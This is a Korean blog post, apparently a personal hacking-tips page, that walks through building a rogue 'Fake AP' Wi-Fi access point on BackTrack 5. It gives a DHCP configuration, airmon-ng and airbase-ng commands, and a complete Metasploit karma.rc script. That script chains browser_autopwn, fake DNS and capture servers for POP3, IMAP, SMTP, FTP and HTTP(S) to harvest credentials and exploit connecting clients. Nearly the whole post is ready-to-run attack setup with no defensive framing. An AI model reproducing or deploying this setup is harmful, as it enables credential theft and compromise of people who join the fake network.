티스토리 뷰

Tip

Wireless Hacking - Fake AP

do9dark 2016. 9. 2. 02:19

0x00. 환경구성

OS : BackTrack 5 R3 (32-bit)

Kernel : Linux bt 3.2.6


# netstat -nltp


0x01. dhcp3-server install

# vi /etc/apt/sources.list

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing


# apt-get install dhcp3-server


0x02. dhcpd.conf

# vi /etc/dhcp3/dhcpd.conf

option domain-name-servers 10.0.0.1;


#default-lease-time 600;

max-lease-time 720;


ddns-update-style none;


authoritative;


log-facility local7;


subnet 10.0.0.0 netmask 255.255.255.0 {

range 10.0.0.100 10.0.0.254;

option routers 10.0.0.1;

option domain-name-servers 10.0.0.1;

}


0x03. karma.rc

# vi /root/karma.rc

load db_sqlite3

db_create /root/karma.db


use auxiliary/server/browser_autopwn


setg AUTOPWN_HOST 10.0.0.1

setg AUTOPWN_PORT 55550

setg AUTOPWN_URI /ads


set LHOST 10.0.0.1

set LPORT 45000

set SRVPORT 55550

set URIPATH /ads


run


use auxiliary/server/capture/pop3

set SRVPORT 110

set SSL false

run


use auxiliary/server/capture/pop3

set SRVPORT 995

set SSL true

run


use auxiliary/server/capture/ftp

run


use auxiliary/server/capture/imap

set SSL false

set SRVPORT 143

run


use auxiliary/server/capture/imap

set SSL true

set SRVPORT 993

run


use auxiliary/server/capture/smtp

set SSL false

set SRVPORT 25

run


use auxiliary/server/capture/smtp

set SSL true

set SRVPORT 465

run


use auxiliary/server/fakedns

unset TARGETHOST

set SRVPORT 5353

run


use auxiliary/server/fakedns

unset TARGETHOST

set SRVPORT 53

run


use auxiliary/server/capture/http

set SRVPORT 80

set SSL false

run


use auxiliary/server/capture/http

set SRVPORT 8080

set SSL false

run


use auxiliary/server/capture/http

set SRVPORT 443

set SSL true

run


use auxiliary/server/capture/http

set SRVPORT 8443

set SSL true

run


0x04. iwconfig

Configure a wireless network interface.

iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.


# iwconfig


0x05. airmon-ng

airmon-ng is script can be used to enable monitor mode on wireless interfaces.


airmon-ng <start|stop> <interface>


# airmon-ng start wlan0


0x06. airbase-ng

Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.


airbase-ng [options] <interface>


[Options]

-y 

: When using this options, the fake AP will not respond to broad-cast probes.

-c <channel> 

: This is used to specify the channel on which to run the Access Point.


[Filter options]

-e <ESSID>

--essid <ESSID>

: Specify a single ESSID.


# airbase-ng -y -c 9 -e "Fake-AP" mon0


0x07. Virtual NIC at0 config

# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# ifconfig at0


0x08. DHCP Server Activation

# mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0


# cat /var/lib/dhcp3/dhcpd.leases

DHCP 서버가 클라이언트 호스트에게 할당한 IP 주소에 대한 할당 정보를 기록


0x09. Metasploit

# msfconsole -r karma.rc


'Tip' 카테고리의 다른 글

달력 표시하기  (0) 2017.03.14
Stop using SHA-1  (0) 2017.02.27
Kali 기본적인 설정 (패키지 관리, 한글 입력)  (0) 2016.11.04
Wireless Hacking - WPA Key Crack  (0) 2016.09.04
Wireless Hacking - WEP Key Crack  (0) 2016.09.03
df / du 용량 확인  (0) 2016.06.27
Bash Shell History 흔적 제거  (0) 2016.06.20
[Emacs] 시작, 이동 그리고 종료  (0) 2016.02.19
BurpSuite 특정 대상만 보기  (0) 2016.02.08
MySQL 특정 버전 설치하기  (0) 2016.01.20
댓글
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
링크
공지사항
Total
Today
Yesterday